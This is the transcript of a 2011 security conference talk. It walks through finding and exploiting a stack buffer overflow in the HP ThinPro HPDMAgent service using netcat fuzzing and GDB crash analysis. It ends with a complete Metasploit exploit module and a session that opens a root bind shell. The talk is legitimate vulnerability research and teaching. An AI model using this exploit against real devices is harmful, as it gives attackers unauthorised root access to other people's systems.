Zero to 0day in 4+1

Transcript

1. Date[Edit in slide master] Zero to 0day in 4+1 (and

   a bit) Alex Chapman \Con\Con 2011

2. Date[Edit in slide master] On Site Testing

3. Date[Edit in slide master] The Target – HP ThinPro

4. Date[Edit in slide master] Initial Recon - Nessus

5. Date[Edit in slide master] Initial Recon - Nmap Nmap scan

   report for 192.168.93.132 PORT STATE SERVICE VERSION 111/tcp open rpcbind 2 (rpc #100000) 4000/tcp open remoteanything? 6000/tcp open X11 (access denied) 40001/tcp open unknown 48578/tcp open status 1 (rpc #100024) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port40001-TCP:V=5.35DC1%I=7%D=6/23%Time=4E030EC3%P=i686-pc-linux-gnu%r( SF:SIPOptions,8A,"Length:22\x2022\r\nFrom:0\r\nCompress:no\r\nVersion:4\r\ SF:nTaskID:0\r\nTaskType:AuthenticationResult\r\nAddress:00:0C:29:3A:5C:9E SF:\r\n\r\n<ACK>InvalidTask</ACK>"); Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.13 - 2.6.31

6. Date[Edit in slide master] Nmap Service Probes • Nmap service

   probes send data designed to trigger responses to a listening service port • Responses are matched against regular expressions to identify previously profiled services • Probe / Response signatures are stored in the “nmap- service-probes” file in the nmap directory SF-Port40001-TCP:V=5.35DC1%I=7%D=6/23%Time=4E030EC3%P=i686-pc-linux-gnu%r( SF:SIPOptions,8A,"Length:22\x2022\r\nFrom:0\r\nCompress:no\r\nVersion:4\r\ SF:nTaskID:0\r\nTaskType:AuthenticationResult\r\nAddress:00:0C:29:3A:5C:9E SF:\r\n\r\n<ACK>InvalidTask</ACK>");

7. Date[Edit in slide master] The Initial Request > nc –vvn

   192.168.93.132 40001 OPTIONS sip:nm SIP/2.0 Via: SIP/2.0/TCP nm;branch=foo From: <sip:nm@nm>;tag=root To: <sip:nm2@nm2> Call-ID: 50000 CSeq: 42 OPTIONS Max-Forwards: 70 Content-Length: 0 Contact: <sip:nm@nm> Accept: application/sdp

8. Date[Edit in slide master] The Initial Request > nc –vvn

   192.168.93.132 40001 OPTIONS sip:nm SIP/2.0 Via: SIP/2.0/TCP nm;branch=foo From: <sip:nm@nm>;tag=root To: <sip:nm2@nm2> Call-ID: 50000 CSeq: 42 OPTIONS Max-Forwards: 70 Content-Length: 0 Contact: <sip:nm@nm> Accept: application/sdp Length:22 22 From:0 Compress:no Version:4 TaskID:0 TaskType:AuthenticationResult Address:00:0C:29:3A:5C:9E <ACK>InvalidTask</ACK> sent 223, rcvd 138

9. Date[Edit in slide master] Refining The Request > nc –vvn

   192.168.93.132 40001 OPTIONS sip:nm SIP/2.0 Via: SIP/2.0/TCP nm;branch=foo From: <sip:nm@nm>;tag=root To: <sip:nm2@nm2> Call-ID: 50000 CSeq: 42 OPTIONS Max-Forwards: 70 Content-Length: 0 Contact: <sip:nm@nm> Accept: application/sdp TaskType:AuthenticationResult

10. Date[Edit in slide master] Refining The Request > nc –vvn

    192.168.93.132 40001 OPTIONS sip:nm SIP/2.0 Via: SIP/2.0/TCP nm;branch=foo From: <sip:nm@nm>;tag=root To: <sip:nm2@nm2> Call-ID: 50000 CSeq: 42 OPTIONS Max-Forwards: 70 Content-Length: 0 Contact: <sip:nm@nm> Accept: application/sdp TaskType:AuthenticationResult Length:11 11 From:0 Compress:no Version:4 TaskID:0 TaskType:AuthenticationResult Address:00:0C:29:3A:5C:9E <ACK></ACK> sent 256, rcvd 127

11. Date[Edit in slide master] Refining The Request > nc –vvn

    192.168.93.132 40001 TaskType:AuthenticationResult Content-Length: 0

12. Date[Edit in slide master] Refining The Request > nc –vvn

    192.168.93.132 40001 TaskType:AuthenticationResult Content-Length: 0 Length:11 11 From:0 Compress:no Version:4 TaskID:0 TaskType:AuthenticationResult Address:00:0C:29:3A:5C:9E <ACK></ACK> sent 54, rcvd 127

13. Date[Edit in slide master] Fuzzing The Request > nc –vvn

    192.168.93.132 40001 TaskType:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Content-Length: 0

14. Date[Edit in slide master] Fuzzing The Request > nc –vvn

    192.168.93.132 40001 TaskType:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Content-Length: 0 sent 534, rcvd 0

15. Date[Edit in slide master] Fuzzing The Request > nmap –sS

    –PN –p 40001 192.168.93.132 Nmap scan report for 192.168.93.132 PORT STATE SERVICE 40001/tcp closed unknown Ooops!!1!

16. Date[Edit in slide master] The End... • Unfortunately at this

    point we were running out of time on client site • Lot of other testing and reporting to be done • The issue was reported to the client as a Denial of Service vulnerability with potential for code execution ...Or Is It?

17. Date[Edit in slide master] Part 2 – Analysing The Crash

    Further Investigation

18. Date[Edit in slide master] Continuing The Pwnage • Fortunately HP

    provide a pre-configured ThinPro virtual machine for testing purposes • HP ThinPro Test Drive • Download and unpack the virtual machine and we’re ready to continue testing

19. Date[Edit in slide master] Setting Up The Debug Environment •

    Option 1: Configure the Virtual Machine with GDB • Vulnerable package already installed • No GDB or symbols • Root file system mounted in read only • Option 2: Install the vulnerable package on another distribution • Must ‘acquire’ the vulnerable package • GDB and symbols already installed

20. Date[Edit in slide master] Analysing The Crash – GDB Program

    received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xb61abb90 (LWP 3769)] 0xb6e890c0 in std::string::assign () from /usr/lib/libstdc++.so.6 (gdb) info reg eax 0x4141414d 1094795597 ecx 0x1f4 500 edx 0x80808000 -2139062272 ebx 0xb6ed8ff4 -1225945100 esp 0xb61ab080 0xb61ab080 ebp 0xb61ab0a8 0xb61ab0a8 esi 0x4141414d 1094795597 edi 0xb61ab0d0 -1239764784 eip 0xb6e890c0 0xb6e890c0 eflags 0x10292 [ AF SF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51

21. Date[Edit in slide master] Analysing The Crash – GDB (gdb)

    x/100x $esp 0xb61ab080: 0x00000003 0x00000041 0x00000061 0x00000000 0xb61ab090: 0x00000004 0x080f9d61 0x080f9d63 0xb61ab0d0 0xb61ab0a0: 0x09ec7381 0x09ec7378 0xb61ab208 0x080dda58 0xb61ab0b0: 0x4141414d 0xb61ab0d0 0x000001f4 0xb6ed8ff4 0xb61ab0c0: 0xb61ab2f8 0x00000014 0xb61ab0d0 0xb6d9ef15 0xb61ab0d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab100: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab110: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab120: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab130: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab140: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab150: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab160: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab170: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab180: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab190: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1d0: 0x41414141 0x41414141 0x41414141 0x41414141

22. Date[Edit in slide master] Classic Stack Based Buffer Overflow (gdb)

    x/100x $esp 0xb61ab080: 0x00000003 0x00000041 0x00000061 0x00000000 0xb61ab090: 0x00000004 0x080f9d61 0x080f9d63 0xb61ab0d0 0xb61ab0a0: 0x09ec7381 0x09ec7378 0xb61ab208 0x080dda58 0xb61ab0b0: 0x4141414d 0xb61ab0d0 0x000001f4 0xb6ed8ff4 0xb61ab0c0: 0xb61ab2f8 0x00000014 0xb61ab0d0 0xb6d9ef15 0xb61ab0d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab100: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab110: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab120: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab130: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab140: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab150: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab160: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab170: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab180: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab190: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1d0: 0x41414141 0x41414141 0x41414141 0x41414141

23. Date[Edit in slide master] Analysing The Crash – GDB (gdb)

    x/100x $esp 0xb61ab080: 0x00000003 0x00000041 0x00000061 0x00000000 0xb61ab090: 0x00000004 0x080f9d61 0x080f9d63 0xb61ab0d0 0xb61ab0a0: 0x09ec7381 0x09ec7378 0xb61ab208 0x080dda58 0xb61ab0b0: 0x4141414d 0xb61ab0d0 0x000001f4 0xb6ed8ff4 0xb61ab0c0: 0xb61ab2f8 0x00000014 0xb61ab0d0 0xb6d9ef15 0xb61ab0d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab0f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab100: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab110: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab120: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab130: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab140: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab150: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab160: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab170: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab180: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab190: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb61ab1d0: 0x41414141 0x41414141 0x41414141 0x41414141

24. Date[Edit in slide master] Locating The Vulnerable Function • Set

    a breakpoint in the crashing function in GDB • Run a non-overflowing test case • Backtrace the code execution back from libc++ • This gives us the address of the vulnerable function • Next step, load the binaries into IDA and dissassemble (gdb) backtrace #0 0xb667ee10 in std::string::assign () from /usr/lib/libstdc++.so.6 #1 0x080dda58 in ?? () #2 0x08083c2d in ?? () #3 0x08082f14 in ?? () #4 0x08063bf1 in ?? () #5 0xb66da96e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #6 0xb6524a4e in clone () from /lib/tls/i686/cmov/libc.so.6

25. Date[Edit in slide master] Digging Deeper – IDA Pro

26. Date[Edit in slide master] Part 3 – Vulnerability To Exploit

    The Road To Ruin

27. Date[Edit in slide master] Exploiting The Vulnerability • Exploiting this

    issue is actually rather easy • The cutdown Linux distribution includes no NX (DEP) or ASLR • Only two issues to overcome • The program does not crash while attempting to return to 0x41414141 (as hoped) • The crash appears in a call to the “std::string::assign” function in the “libstdc++” module • The stack needs fixing in order to execute our own code

28. Date[Edit in slide master] Calling std::string::assign • Assigns new content

    to a string • std::string::assign(char const*, unsigned int) • Actually takes 3 arguments • A pointer to a string • The unsigned integer is the length of our input buffer • The char const* is pointer to our input buffer • The application takes care of arguments 2 and 3 • We can supply any pointer to writable memory for argument 1 • 0x0811b0a4 • 0x0811b104 • 0x0811b164

29. Date[Edit in slide master] Fixing The Stack • The stack

    at the end of the function looks like above • The argument we passed to std::string::assign is in the way for executing shellcode directly with a JMP ESP • Two options • Return to a JMP [ESP+4] • Return to a POP, RET then a JMP ESP • These both have the same result to begin code execution after the std::string::assign argument 0xb59b51cc: 0x41414141 0x0811b098 0x41414141 0x41414141 0xb59b51dc: 0x41414141 0x41414141 0x41414141 0x41414141 0xb59b51ec: 0x41414141 0x41414141 0x41414141 0x41414141 0xb59b51fc: 0x41414141 0x41414141 0x41414141 0x41414141

30. Date[Edit in slide master] The Metasploit Module require 'msf/core' class

    Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HPDMAgent TaskType Buffer Overflow', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\xff", }, 'Platform' => 'linux', 'Targets' => [ ['HP ThinPro', { 'Ret' => 0x0810093f, 'PopRet' => 0x08052632, 'StrObj' => 0x0811B0A4, }], ], 'DefaultTarget' => 0)) register_options([ Opt::RPORT(40001) ], self.class) end def exploit connect() exdata = "TaskType:" + Rex::Text.rand_text_alpha(316) exdata += [target['PopRet']].pack('V') exdata += [target['StrObj'] - 0xC].pack('V') exdata += [target['Ret']].pack('V') exdata += payload.encoded exdata += "\r\nContent-Length: 1\r\n\r\n\r\n" sock.put(exdata) handler() disconnect() end end

31. Date[Edit in slide master] The Metasploit Module msf > use

    linux/misc/hpdmagent msf > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(hpdmagent) > set RHOST 192.168.91.147 RHOST => 192.168.91.147 msf exploit(hpdmagent) > exploit [*] Started bind handler [*] Command shell session 1 opened (192.168.91.131:54453 -> 192.168.91.147:4444) at Fri Oct 14 12:14:55 -0400 2011 hostname HP000c29356281 id uid=0(root) gid=0(root) groups=0(root)

32. Date[Edit in slide master] Identifying These Issues • Manual Fuzzing

    (netcat and persistence) • Automated Fuzzing • Sulley • Peach • CAT Fuzzer • Nessus (dumb luck)

33. Date[Edit in slide master] Any Questions